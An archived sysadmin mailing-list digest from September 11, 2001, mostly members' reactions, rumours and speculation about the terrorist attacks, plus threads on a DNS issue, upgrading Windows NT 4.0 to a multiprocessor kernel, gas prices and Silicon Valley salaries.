freedom of speech, press, and/or religion. I plead the Fifth is a common expression meaning I am not going to answer that, because it might get me in trouble. Whenever there is a major public criminal crisis, there are always those who advocate restricting these rights in the name of security or need. They do not seem to understand that the worst kind of crime is that inflicted by your own government against you. In this case, we can expect people to claim: - We should punish people without a trial, or even evidence - We should punish people who have committed no crimes - We should close our borders - Police should be able to search anyone at any time without a warrant - Police should be able to monitor private communications without a warrant Any of the above would violate the Bill of Rights. -- Ben Scott [EMAIL PROTECTED] | The opinions expressed in this message are those of the author and do not | | necessarily represent the views or policy of any other person, entity or | | organization. All information is provided without warranty of any kind. | http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Australian Expressing Sadness + Something to think about
Title: RE: Australian Expressing Sadness + Something to think about Last night while watching my son at Pop Warner football practice, this tragedy was of course the topic of conversation. It's amazing to me how many experts there are. One guy was talking about why Muslims hate Christians. Being pretty damn ignorant, I decided to do a little research this morning, and found this site - www.islam-guide.com. Maybe it's watered down a bit, and it doesn't explain religious fanaticism. But at least I understand their religion a little bit better. Just thought I throw this out. At least for me, education and understanding goes a long way. -Original Message- From: John Hornbuckle [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 12, 2001 8:33 AM To: NT System Admin Issues Subject: RE: Australian Expressing Sadness + Something to think about On top of Revelation, the book of Daniel also makes for an interesting read. I'm not going to use this forum (or my employer's time) to proselytize. I would just encourage those who do not believe that the Bible is the word of God to maybe reconsider when Israel becomes involved in an all-out war in the Middle East. If I'm wrong and the war never happens, you can thumb your nose at me and laugh. But if I'm right and the war DOES happen, grab yourself a Bible and start reading it with the state of mind that it may not just be a book full of fiction after all. Intellectuality and faith are not mutually exclusive. That's all I'm going to say on the matter, so please withhold the flames (unless you want to send them to me personally off the list). John Hornbuckle Network Manager Taylor County School District 318 North Clark Street Perry, FL 32347 -Original Message- From: Matthew Western [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 7:55 PM To: NT System Admin Issues Subject: Australian Expressing Sadness + Something to think about Hi People, I'd just like to express sadness to all the people in the US effected by the attacks on US. I think it's disgusting and should be punished. While people everywhere are in a state of shock/uncertainty/fear it's worth thinking about where each of us are going to spend our eternal destiny. The Bible predicts basically a World War 3 where everyone will attack Israel and try to wipe them off the face off the earth... Revelation is an interesting book to read through Have a good day (and think about the following excert). Regards Matthew http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: NewYork Terrorist Attack
Title: RE: NewYork Terrorist Attack You can't retaliate for the sake of retaliating. It could be Americans. -Original Message-From: David James [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 8:45 AMTo: NT System Admin IssuesSubject: RE: NewYork Terrorist Attack I don't mean to promote war, but we as a country HAVE to retaliate to this... F00k the 3rd world countries that harbor terrorists... -Original Message-From: Mal Sasalu [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 10:33 AMTo: NT System Admin IssuesSubject: RE: NewYork Terrorist Attack I watched over the television. The structures of both north and south towers of WTO came down with a huge blast and now they are basically a heap of rubble. -Original Message-From: Rogers, Jeff L (OM) [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 9:30 AMTo: NT System Admin IssuesSubject: RE: NewYork Terrorist Attack Could you confirm either more or less whether the structures are basically now grade level? -Original Message- From: Roman Bogdanov [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 10:24 To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack Im about 40 blocks from the towers and we were all told we can go home but all the bridges and subways are closed so here i am trying to figure out a way to get to brooklyn. Roman Bogdanov Head of IT Support Jnana Technologies Corp. www.jnana.com 212-560-9151 ext. 202 212-560-9066 fax -Original Message- From: Richard Newton Jr. [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 11:24 AM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack Us in Jersey City, NJ (just across the water) were evacuated and sent home. Its going to be a long day for all. -Original Message- From: Jeff Pace [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 11:26 AM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack and it doesn't seem to be over yet. Jeff -Original Message- From: Andrew Baker [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 8:19 AM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack This is an incredibly tragic day. Probably the most tragic for the US since the assassination of JFK - ASB -Original Message- From: Richard McMahon [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 11:07 AM To: NT System Admin Issues Subject: NewYork Terrorist Attack Check out this link. http://www.skynews.co.uk/skynews/storytemplate/storytoppic/0,,3-1029 102, 00.html Hope out all you guys in the New York area are still with us.. Good luck, Richard http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: NewYork Terrorist Attack
Title: RE: NewYork Terrorist Attack they're both effectively down. -Original Message-From: David N. Precht [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 8:36 AMTo: NT System Admin IssuesSubject: RE: NewYork Terrorist Attack the second tower hit was about 50 floors toppled... not sure of the other tower -Original Message-From: Rogers, Jeff L (OM) [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 11:30To: NT System Admin IssuesSubject: RE: NewYork Terrorist Attack Could you confirm either more or less whether the structures are basically now grade level? -Original Message- From: Roman Bogdanov [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 10:24 To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack Im about 40 blocks from the towers and we were all told we can go home but all the bridges and subways are closed so here i am trying to figure out a way to get to brooklyn. Roman Bogdanov Head of IT Support Jnana Technologies Corp. www.jnana.com 212-560-9151 ext. 202 212-560-9066 fax -Original Message- From: Richard Newton Jr. [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 11:24 AM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack Us in Jersey City, NJ (just across the water) were evacuated and sent home. Its going to be a long day for all. -Original Message- From: Jeff Pace [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 11:26 AM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack and it doesn't seem to be over yet. Jeff -Original Message- From: Andrew Baker [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 8:19 AM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack This is an incredibly tragic day. Probably the most tragic for the US since the assassination of JFK - ASB -Original Message- From: Richard McMahon [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 11:07 AM To: NT System Admin Issues Subject: NewYork Terrorist Attack Check out this link. http://www.skynews.co.uk/skynews/storytemplate/storytoppic/0,,3-1029 102, 00.html Hope out all you guys in the New York area are still with us.. Good luck, Richard http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: NewYork Terrorist Attack
Title: RE: NewYork Terrorist Attack http://www.newbie.net/PearlHarbor/casualties.html - Not even close to the number of estimated deaths today. -Original Message- From: John Hornbuckle [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 9:07 AM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack How many were killed at Pearl Harbor? John Hornbuckle Network Manager Taylor County School District 318 North Clark Street Perry, FL 32347 -Original Message- From: Nail, Larry [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 12:00 PM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack Try Perl Harbor... -Original Message- From: Andrew Baker [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 10:19 AM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack This is an incredibly tragic day. Probably the most tragic for the US since the assassination of JFK - ASB http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: NewYork Terrorist Attack
Title: RE: NewYork Terrorist Attack There will be tons of speculation as our imaginations, paranoia and anger continue to grow. Every supposed expert the news organizations can find will have a theory. -Original Message- From: Sean Martin [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 9:42 AM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack It's starting to be more believed that multiple terrorist groups and even governments would have to be involved to orchestrate such a coordinated attack on the US. Regards, Sean Martin, MCSE Network Administrator Ribelin Lowell Company Insurance Brokers, Inc. 3111 C Street, Suite 300 Anchorage, Alaska 99503 Ph: (907) 561-1250 Fax: (907) 561-4315 Cell: (907) 229-0885 Email: [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] -Original Message- From: Sankaranarayanan_Ganapathy [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 8:09 AM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack Most possible culprit could be Osma bin laden afghan based terrorist,bcoz of the kind of resources used or it could be any one from within America -- From: Phillips, Glen[SMTP:[EMAIL PROTECTED]] Reply To: NT System Admin Issues Sent: Tuesday, September 11, 2001 9:18 PM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack Apparently some Palestinian organisation has claimed responsibility. The Islamic groups have denied it all. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Tuesday, 11 September 2001 16:43 To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack You can't retaliate for the sake of retaliating. It could be Americans. -Original Message- From: David James [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 8:45 AM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack I don't mean to promote war, but we as a country HAVE to retaliate to this... F00k the 3rd world countries that harbor terrorists... -Original Message- From: Mal Sasalu [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 10:33 AM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack I watched over the television. The structures of both north and south towers of WTO came down with a huge blast and now they are basically a heap of rubble. -Original Message- From: Rogers, Jeff L (OM) [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 9:30 AM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack Could you confirm either more or less whether the structures are basically now grade level? -Original Message- From: Roman Bogdanov [ mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 10:24 To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack Im about 40 blocks from the towers and we were all told we can go home but all the bridges and subways are closed so here i am trying to figure out a way to get to brooklyn. Roman Bogdanov Head of IT Support Jnana Technologies Corp. www.jnana.com 212-560-9151 ext. 202 212-560-9066 fax -Original Message- From: Richard Newton Jr. [ mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 11:24 AM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack Us in Jersey City, NJ (just across the water) were evacuated and sent home. Its going to be a long day for all. -Original Message- From: Jeff Pace [ mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 11:26 AM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack and it doesn't seem to be over yet. Jeff -Original Message- From: Andrew Baker [ mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 8:19 AM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack This is an incredibly tragic day. Probably the most tragic for the US since the assassination of JFK - ASB -Original Message- From: Richard McMahon [ mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 11:07 AM To: NT System Admin Issues Subject: NewYork Terrorist Attack Check out this link. http://www.skynews.co.uk/skynews/storytemplate/storytoppic/0,,3-1029 102, 00.html Hope out all you guys in the New York area are still with us.. Good luck, Richard http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: NewYork Terrorist Attack
Title: RE: NewYork Terrorist Attack Nothing but good thoughts to you Dennis. -Original Message- From: Dennis Atherton [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 10:09 AM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack I have family that work there and in Battery Park. There are usually 50,000 people in the two towers. Start time is normally 8:00 AM for many, and this was 8:50 AM, so many would be there. It would take over 2 hours to evacuate each tower - working together. Everyone needs to step back and see what happens, but I firmly believe there will be more that 20K PEOPLE dead out of this tragedy. Not numbers, but people. This was a terrorist attack, meant to bring the most devastation with the least risk. -Original Message- From: Jason Gauthier [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 10:03 AM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack Woah there. No one has said there are 20,000 people dead. There were 20,000 poeple in the towers when the first plane hit. I beleive Tower 1 was being evacuated when it was hit. -Original Message- From: Dennis Atherton [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 12:59 PM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack And you don't think, that with over 20,000 people dead, World War 3 has not been started on our shores now -Original Message- From: Murray Binette [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 9:56 AM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack Well, I just hope that Bush (or the 'Puppet' as many Canadians refer to him as) doesn't fly off the handle and start WWIII. -Original Message- From: Andrew Baker [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 10:08 AM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack I would say that the US already feels pretty alienated right now - ASB -Original Message- From: Richard McClary [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 11:51 AM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack Well, that's one of the reactions terrorism is trying to provoke. Most of the world finds US policy to be obnoxious, and a violent large scale reaction will effectively alienate the US from the rest of the world. I don't mean to promote war, but we as a country HAVE to retaliate to this... F00k the 3rd world countries that harbor terrorists... http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: NewYork Terrorist Attack
Title: RE: NewYork Terrorist Attack wow. Those of us that aren't there can't even imagine what you'all are going through. I just heard reports that at least in Phoenix, people are lining up like crazy to donate blood. It's something at least. -Original Message-From: Paul Armstrong [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 10:18 AMTo: NT System Admin IssuesSubject: RE: NewYork Terrorist Attack Basically, 40K people work in the Towers and there is estimated 200K people who pass thru the towers. most people who live in NJ and work in NY have to take the path trains to get into the city which passes right under the WTC! i actually witnessed the first plane hitting the tower from Brooklyn while waiting for a cab. I am now at work and trapped in the city because all trains buses are locked down. -Original Message-From: Rogers, Jeff L (OM) [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 11:41 AMTo: NT System Admin IssuesSubject: RE: NewYork Terrorist Attack I heard 50+ thousand -Original Message-From: David N. Precht [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 10:44To: NT System Admin IssuesSubject: RE: NewYork Terrorist Attack any stats on how many people work/live in the WTC and/or area? i estimated around 25k-50k ... -Original Message-From: MLewis [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 11:37To: NT System Admin IssuesSubject: RE: NewYork Terrorist Attack Both World Trade Center buildings have fallen. There is only rubble where these historic structures stood. Marcella D. Lewis Network Administrator [EMAIL PROTECTED] "Excellence is in the details. Give attention to the details and excellence will come." (Perry Paxton) -Original Message-From: Rogers, Jeff L (OM) [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 11:30 AMTo: NT System Admin IssuesSubject: RE: NewYork Terrorist Attack Could you confirm either more or less whether the structures are basically now grade level? -Original Message- From: Roman Bogdanov [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 10:24 To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack Im about 40 blocks from the towers and we were all told we can go home but all the bridges and subways are closed so here i am trying to figure out a way to get to brooklyn. Roman Bogdanov Head of IT Support Jnana Technologies Corp. www.jnana.com 212-560-9151 ext. 202 212-560-9066 fax -Original Message- From: Richard Newton Jr. [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 11:24 AM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack Us in Jersey City, NJ (just across the water) were evacuated and sent home. Its going to be a long day for all. -Original Message- From: Jeff Pace [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 11:26 AM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack and it doesn't seem to be over yet. Jeff -Original Message- From: Andrew Baker [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 8:19 AM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack This is an incredibly tragic day. Probably the most tragic for the US since the assassination of JFK - ASB -Original Message- From: Richard McMahon [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 11:07 AM To: NT System Admin Issues Subject: NewYork Terrorist Attack Check out this link. http://www.skynews.co.uk/skynews/storytemplate/storytoppic/0,,3-1029 102, 00.html Hope out all you guys in the New York area are still with us.. Good luck, Richard http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htm This e-mail is intended only for the addressee named above. This e-mail may contain confidential or privileged
RE: NewYork Terrorist Attack
Title: RE: NewYork Terrorist Attack Just heard there's a nutball with a bomb and a gun in Memphis. -Original Message-From: Bart Southworth [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 10:34 AMTo: NT System Admin IssuesSubject: RE: NewYork Terrorist Attack That would be difficult. We did take care of the last one, here in good old Indiana. But the thought. Wow. The taliban is being "sketchy," no denial. I'm at a loss. Anyone want to explain this to my 6 4 year olds? The younger is asking now. I dread the eldest coming home from school. I hope you have luck with yours, Andrew. I read on another list, that there may be a coordinated internet "worm" attack. (Not confirmed) -Original Message-From: Andrew Baker [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 12:12To: NT System Admin IssuesSubject: RE: NewYork Terrorist AttackEspecially when we've had Internal Terrorism before. I'm almost hoping it's an external attack, because we will not be able to deal with an internal attack of this magnitude. - ASB http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: DNS problem
did they use the same namespace as their domain name? -Original Message-From: Luke Brumbaugh [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 10:40 AMTo: NT System Admin IssuesSubject: RE: DNS problem Did they hardcode the address in the dns? And is it replicated to all the nameservers registered. And is the ISP letting it go out the firewall? -Original Message-From: Matt Moore [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 1:39 PMTo: NT System Admin IssuesSubject: DNS problem A customer has a pure 2000 network. From the insidewe are able to resolve all names internal and external with the exception of their web page which is hosted off site. The internal DNSforwarders are set totalk to the ISP's DNS servers. All of the ISP's DNS records are correct. The ISP hosts their web page. Anybody got any ideas. Matt MooreMCSE, MCP+I, NCSS, HPhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htm Enterprise Channel Management Software for Manufacturers Visit us at http://www.ultryx.com http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: NewYork Terrorist Attack
Title: Message I'd rather wait and see. 9/11 is the anniversary of the death of Allende in Chile. The head of that drug cartel was deported to the US, and he's got money. It's too early to tell. -Original Message-From: Allen Crawford [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 11:42 AMTo: NT System Admin IssuesSubject: RE: NewYork Terrorist Attack Retaliation for executing McVey? -Original Message-From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 10:57 AMTo: NT System Admin IssuesSubject: RE: NewYork Terrorist Attack unlikely, yes. But Oklahoma City was done by an American. Wow, did I just get a deja vu while typing this. -Original Message-From: John Hornbuckle [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 8:53 AMTo: NT System Admin IssuesSubject: RE: NewYork Terrorist Attack That seems very, very unlikely. I heard earlier that a Palestinian group had claimed responsibility, and my hunch is that such a group (whether or not it was this specific group) is to blame. John HornbuckleNetwork ManagerTaylor County School District318 North Clark StreetPerry, FL 32347 -Original Message-From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 11:43 AMTo: NT System Admin IssuesSubject: RE: NewYork Terrorist Attack You can't retaliate for the sake of retaliating. It could be Americans. http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: NewYork Terrorist Attack
Title: RE: NewYork Terrorist Attack Hopefully you'll never have to find out. -Original Message-From: Murray Binette [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 12:11 PMTo: NT System Admin IssuesSubject: RE: NewYork Terrorist Attack I find it hard to beleive that the US would give a rats ass if something similar happened in Toronto or Edmonton. -Original Message-From: Paul Armstrong [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 12:13 PMTo: NT System Admin IssuesSubject: RE: NewYork Terrorist Attack How is this relevant? Well, I know some people who work in the WTC who are sys admins and I haven't been able to contact them since the crisis. Obviously there are others who are sys admins who probably lost there lives in this situation. I take it you know noone in NYC and probably dont care. I guess I wouldn't be wrong if the roles were reversed and this happened in your home town and you were caught in the middle of this thing and I didn't care. If you dont like the posts relating to this event, you could always filter them or simply unsubscribe, who cares since you have no sympathy for what has happened today! If this situation gets larger than what it already is and it starts to effect you, you will then find out the relevance to this list!! -Original Message-From: Murray Binette [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 1:43 PMTo: NT System Admin IssuesSubject: RE: NewYork Terrorist Attack How is this relevant to NT system administration? -Original Message-From: Paul Armstrong [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 11:18 AMTo: NT System Admin IssuesSubject: RE: NewYork Terrorist Attack Basically, 40K people work in the Towers and there is estimated 200K people who pass thru the towers. most people who live in NJ and work in NY have to take the path trains to get into the city which passes right under the WTC! i actually witnessed the first plane hitting the tower from Brooklyn while waiting for a cab. I am now at work and trapped in the city because all trains buses are locked down. -Original Message-From: Rogers, Jeff L (OM) [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 11:41 AMTo: NT System Admin IssuesSubject: RE: NewYork Terrorist Attack I heard 50+ thousand -Original Message-From: David N. Precht [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 10:44To: NT System Admin IssuesSubject: RE: NewYork Terrorist Attack any stats on how many people work/live in the WTC and/or area? i estimated around 25k-50k ... -Original Message-From: MLewis [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 11:37To: NT System Admin IssuesSubject: RE: NewYork Terrorist Attack Both World Trade Center buildings have fallen. There is only rubble where these historic structures stood. Marcella D. Lewis Network Administrator [EMAIL PROTECTED] "Excellence is in the details. Give attention to the details and excellence will come." (Perry Paxton) -Original Message-From: Rogers, Jeff L (OM) [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 11:30 AMTo: NT System Admin IssuesSubject: RE: NewYork Terrorist Attack Could you confirm either more or less whether the structures are basically now grade level? -Original Message- From: Roman Bogdanov [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 10:24 To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack Im about 40 blocks from the towers and we were all told we can go home but all the bridges and subways are closed so here i am trying to figure out a way to get to brooklyn. Roman Bogdanov Head of IT Support Jnana Technologies Corp. www.jnana.com 212-560-9151 ext. 202 212-560-9066 fax -Original Message- From: Richard Newton Jr. [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 11:24 AM
RE: Installing second CPU
Title: Installing second CPU use UPTOMP. Or use the snip below from Anthony Bennett: Forget UPTOMP. I have successfully used the following technique as provided by Microsoft: 1) Put 2nd processor in 2) Regurgitated from archive (courtesy of Dave Nestor from Microsoft): I would recommend against using Uptomp.exe unless you have revision 3 of the NT4 Resource Kit. A simpler way to do this is to edit the hidden, read-only file called setup.log that's in the \WINNT\Repair directory and reapply your current service pack. Update.exe from the service pack relies on information in setup.log for the proper files to install, it does not do any discovery process, so if the wrong information is in that file, a dual processor computer can be blindly returned to single processor mode. Six files in the System32 directory determine NT's multiprocessor capability. NT is multiprocessor by default which is why we load the mutliprocessor kernel during a fresh install. Later during that install, if only a single processor is found, we install hal.dll or halapic.dll and rename it to hal.dll and copy in ntoskrnl.exe. Setup will also "smash locks" on four other files, kernel32.dll, ntdll.dll, win32k.sys and winsrv.dll to make them single processor versions. Failure to alter those four files will burden a single processor computer with about a 5% performance hit. Therefore, the manual way to do an upgrade is, from a command prompt only (using a GUI will give you an access violation) rename the current six files to *.old and copy in fresh versions of kernel32.dll ntdll.dll win32k.sys winsrv.dll halmps.dll and rename it to hal.dll ntkrnlmp.exe and rename it to ntoskrnl.exe Of course, these had better be files from your current service pack and not from the original CD. Now you're left with the problem of the setup.log file containing single processor information. The next service pack install will move you back to a single processor version of NT. So edit that file with the following information, being careful to enter the correct checksums which will tell the next service pack not to "smash locks" on four files. \WINNT\system32\ntoskrnl.exe = "ntkrnlmp.exe","e76ab" \WINNT\system32\hal.dll = "halmps.dll","1a01c" \WINNT\system32\kernel32.dll = "kernel32.dll","5b7f8" \WINNT\system32\ntdll.dll = "ntdll.dll","59c19" \WINNT\system32\win32k.sys = "win32k.sys","132603" \WINNT\system32\winsrv.dll = "winsrv.dll","37b4e" Do a notepad search on the individual file names to find these lines, since they are not together in setup.log. OK, now you're done. Or, edit the setup.log first and reapply your current service pack. That's the quick way to do this. = Cheers, Anthony Bennett -Original Message-From: Blake R. Fowkes [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 11:41 AMTo: NT System Admin IssuesSubject: Installing second CPU I am wanting to install a second processor in my Dell 1400 server. Can anyone point me in the right direction as to what I will need to do to Windows NT 4.0 server to make sure I do not mess things up. Thanks, Blake Fowkes Waid and Associates http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Attack and Gas Prices
Title: RE: Attack and Gas Prices blackberry would do that. -Original Message- From: Murray Freeman [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 2:43 PM To: NT System Admin Issues Subject: RE: Attack and Gas Prices Hey, do you have a computer in your CAR I want one of those. Murray F. -Original Message- From: Mark L. Kelsay [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 4:34 PM To: NT System Admin Issues Subject: RE: Attack and Gas Prices I just stopped at our local Cumberland Farms gas station here in Southeastern MA and the price is unchanged. Regular unleaded is at $1.37. Mark Kelsay -Original Message- From: David James [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 4:11 PM To: NT System Admin Issues Subject: Attack and Gas Prices Can anyone confirm that gas prices are going up around the country? Supposedly it's around $6.00 a gallon already in some places... http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Silicon Valley salary
Title: RE: Silicon Valley salary try www.salary.com. Should be lucrative for you. -Original Message- From: Markus Laker [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 2:56 PM To: NT System Admin Issues Subject: Silicon Valley salary Once the authorities get around to processing visa applications again, and once the airports reopen, my employer is planning to move me from its UK office here in Bracknell to its San Jose office for a couple of years. Marvellous timing, I know. Salary negotiations are beginning in earnest. Most of the Californian job sites I can find don't mention salaries these days (surprise, surprise). What does a competent C++ developer earn in Silicon Valley these days? Thanks and regards, Markus http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Hub Recommendations
